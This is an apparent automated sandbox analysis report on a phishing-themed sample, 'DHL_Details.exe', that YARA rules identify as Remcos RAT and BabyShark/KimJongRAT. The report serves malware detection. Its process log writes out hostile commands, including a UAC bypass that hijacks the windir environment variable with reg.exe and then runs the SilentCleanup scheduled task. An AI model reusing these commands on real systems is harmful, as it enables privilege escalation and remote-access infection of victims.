Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_10544871 SystemParametersInfoW,12_2_10544871

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000010.00000002.1206561253.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
Source: 00000010.00000002.1206561253.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
Source: 00000014.00000002.2662959040.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 0000000C.00000002.1182878564.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000C.00000002.1182878564.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
Source: 0000000C.00000002.1180913234.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000C.00000002.1180913234.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
Source: 00000010.00000002.1208688497.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
Source: 00000010.00000002.1208688497.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
Source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 12.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 12.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Contains functionality to call native functionsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_105450B2 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,12_2_105450B2
Contains functionality to shutdown / reboot the systemShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai12_2_0040D1E8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_1053F833 atoi,atoi,atoi,ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_1053F833
Detected potential crypto functionShow sources
Source: C:\Users\user\Xgku\Xgkuees.exeCode function: 11_3_022ECB0911_3_022ECB09
Source: C:\Users\user\Xgku\Xgkuees.exeCode function: 11_3_022D2FE111_3_022D2FE1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040D1E812_2_0040D1E8
Found potential string decryption / allocating functionsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 105452E4 appears 47 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 00413956 appears 47 times
PE file contains strange resourcesShow sources
Source: DHL_Details.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: DHL_Details.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DHL_Details.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DHL_Details.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Xgkuees.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Xgkuees.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Xgkuees.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Xgkuees.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version infoShow sources
Source: DHL_Details.exeBinary or memory string: OriginalFilename vs DHL_Details.exe
Source: DHL_Details.exe, 00000000.00000002.1154211402.0000000004890000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs DHL_Details.exe
Source: DHL_Details.exe, 00000000.00000002.1150480060.00000000022D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs DHL_Details.exe
Source: DHL_Details.exe, 00000000.00000003.1107806883.0000000002354000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs DHL_Details.exe
Source: DHL_Details.exe, 00000000.00000002.1152567508.0000000002900000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs DHL_Details.exe
Searches for the Microsoft Outlook file pathShow sources
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Uses reg.exe to modify the Windows registryShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Yara signature matchShow sources
Source: 00000010.00000002.1206561253.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000010.00000002.1206561253.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 00000014.00000002.2662959040.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 0000000C.00000002.1182878564.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000C.00000002.1182878564.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0000000C.00000002.1180913234.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000C.00000002.1180913234.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 00000010.00000002.1208688497.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000010.00000002.1208688497.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 12.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 12.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Classification labelShow sources
Source: classification engineClassification label: mal100.rans.phis.troj.spyw.evad.winEXE@35/10@2/2
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040EB33 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_0040EB33
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_105404C1 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_105404C1
Contains functionality to check free disk spaceShow sources
Source: C:\Users\user\Xgku\Xgkuest.exeCode function: 10_2_00405AC8 GetDiskFreeSpaceA,10_2_00405AC8
Contains functionality to enum processes or threadsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00409AA0 GetModuleFileNameW,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,CloseHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CloseHandle,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,wcslen,?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z,??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CreateMutexA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,CloseHandle,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00409AA0
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00409D73 FindResourceA,LoadResource,LockResource,SizeofResource,12_2_00409D73
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_004111A9 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_004111A9
Creates files inside the user directoryShow sources
Source: C:\Users\user\Desktop\DHL_Details.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PKAQFTEH\1YeIhasQd-1KZ177FInnElYbHMifTTTeL[1].htmJump to behavior
Creates mutexesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-37S93M
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4564:120:WilError_01
Creates temporary filesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile created: C:\Users\user\AppData\Local\Temp\mkjnccfrzfmqzvxtdzmihgnrtwJump to behavior
Executes batch filesShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' '
Parts of this applications are using Borland Delphi (Probably coded in Delphi)Show sources
Source: C:\Users\user\Desktop\DHL_Details.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Xgku\Xgkuest.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Xgku\Xgkuest.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Reads ini filesShow sources
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\DHL_Details.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Users\user\Desktop\DHL_Details.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: DHL_Details.exeVirustotal: Detection: 11%
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\DHL_Details.exeFile read: C:\Users\user\Desktop\DHL_Details.exeJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\DHL_Details.exe 'C:\Users\user\Desktop\DHL_Details.exe'
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' '
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\Yako.bat reg delete hkcu\Environment /v windir /f && REM '
Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
